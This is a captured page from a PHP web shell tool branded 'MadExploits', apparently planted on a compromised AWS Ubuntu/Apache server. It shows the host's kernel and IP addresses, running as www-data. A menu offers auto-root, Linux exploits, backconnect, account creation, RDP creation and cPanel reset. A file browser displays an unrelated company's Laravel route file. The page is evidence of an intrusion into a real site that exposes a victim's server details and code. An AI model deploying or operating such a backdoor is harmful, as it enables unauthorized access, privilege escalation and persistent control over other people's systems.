Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.223.158.66
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
app /
routes /
[ HOME SHELL ]
Name
Size
Permission
Action
api.php
622
B
-rw-r--r--
channels.php
551
B
-rw-r--r--
console.php
593
B
-rw-r--r--
web.php
1.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : web.php
<?php use Illuminate\Support\Facades\Route; use App\User; /* |-------------------------------------------------------------------------- | Web Routes |-------------------------------------------------------------------------- | | Here is where you can register web routes for your application. These | routes are loaded by the RouteServiceProvider within a group which | contains the "web" middleware group. Now create something great! | */ Route::post('/contact', 'WebController@support'); Route::get('/home', function(){ return view('home'); }); Route::get('/', function(){ return view('home'); }); Route::get('/contact', function(){ return view('contact'); }); Route::get('/about', function(){ return view('about'); }); Route::get('/pr-reputation', function(){ return view('pr-reputation'); }); Route::get('/case-study', function(){ return view('case-study'); }); Route::get('/video-production', function(){ return view('video'); }); Route::get('/design', function(){ return view('designs'); }); Route::get('/clients', function(){ return view('clients'); }); Route::get('/career', function(){ return view('career'); }); Route::get('/digital-marketing', function(){ return view('digital'); }); Route::get('/digital-marketing', function(){ return view('digital'); }); Route::get('/pan-atlantic-university', function(){ return view('pan'); }); Route::get('/flour-mill', function(){ return view('flour'); }); Route::get('/quidax', function(){ return view('quidax'); });
Close